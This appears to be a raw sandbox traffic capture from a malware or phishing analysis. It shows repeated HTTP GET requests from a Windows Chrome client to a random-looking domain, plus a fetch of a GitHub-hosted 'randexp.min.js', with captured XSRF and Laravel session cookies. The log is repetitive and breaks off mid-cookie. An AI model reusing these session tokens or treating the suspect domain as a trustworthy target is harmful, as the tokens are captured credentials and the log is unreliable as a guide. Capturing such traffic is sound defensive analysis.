              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250401%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250401T131821Z&X-Amz-Expires=300&X-Amz-Signature=e0f1ce3176fbaf78c0d47fa674aa1f0a5a9d69335e5f0b940abb3fe3e655df04&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uv5h0mg7HpRqFTgJzv0qPNaRQIYstZmHUle2MO7j12122 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /op4TEEKrolYX7BpNfzzXbRT45ghbLnyhycPa1T8KnqC45131 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kludZieQRPg97oN9fbIB511hD89SrD2HIxGmuUHrK1oJvc2ITPe7oIMvtsVfab230 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnpD7x7dx86mlUuPsacoZXPovnPUylHB4a3F4b56z1zt8Os4iQd3ha1L2wx220 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uv5h0mg7HpRqFTgJzv0qPNaRQIYstZmHUle2MO7j12122 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /op4TEEKrolYX7BpNfzzXbRT45ghbLnyhycPa1T8KnqC45131 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnEAwRV8LurwKDnoqzC7tbr6QBNGuv7SezVu3ywnnBk8rAW90141 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klIGmhIzloSDNVZQ0fJEec8W4AE3cdKofOLl4zYRuZoxcL7s56170 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kludZieQRPg97oN9fbIB511hD89SrD2HIxGmuUHrK1oJvc2ITPe7oIMvtsVfab230 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxG0JrQPMlHU0nNYZc69rsYdteMSIMkC06HWwfr9Z1qASaab180 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnpD7x7dx86mlUuPsacoZXPovnPUylHB4a3F4b56z1zt8Os4iQd3ha1L2wx220 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opbd95W8u6CyERvfeIzCVlbOCPMoyRjo9N26ghrmaenMpLyLV5leABdyw2N64Xeccd193 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImdUTU1Namt1N2l3eWpHWWZCVGZTTHc9PSIsInZhbHVlIjoiMzVxbCtEeWlmd0MweWVGM1EyMVdyNWgwRmFqSEJNQTdMN1VDOHMxSm1KSWp3VURiaVNkQzZtSXZ6SUFIRFQ2bXZqMGtLZUVRWGRGdEkxb21ONFJsdkl3Wm1mV2U0OHo4Vkw1N3BhMmQwRi9qZ1lSK2REaHg5RDdNMHZDRFRnOGkiLCJtYWMiOiIyMWNlOTFlMWI0OGI5NGZjNzI2ODRjMDM2YzM0ZTU5MzU1YWU3NGRjMjMzZTk2NWMwOTQxZDJlMDhjOWFkOTNlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijgaYhnWUbVeOTmOpVDJTIXGh6Gy6z3kklsgKKUNsFxX4HupdpQJDsYmTgNfA76ef203 HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inh3WklMdnVsMElrMlVDSGUwci9aUEE9PSIsInZhbHVlIjoiaTZLNXFQWDc2NW80NDVObTBzenkxVVpwWHpHTWd2dnphdGZaWm1BbFl2bGtXem1PNW9MMzFzVFpLL2lhc1VHZi9lL1kwSWVMMThXR2YzYzc3SHVuS1ZKZVcyVlFBZXFIVXovRXh2OGJ1b1E4WXA4eVkxWU4zY3ZmQVczNU5rQkYiLCJtYWMiOiI3NTQwOGZkMTE4ZDQ4OTBmYWRmN2VmN2UxNDJkZjZmODA0YWVlNmU5ZjZkZDkyOWE2Yzg2NDBhNzA2Y2Q5MzBmIiwidGFnIjoiIn0%3D; 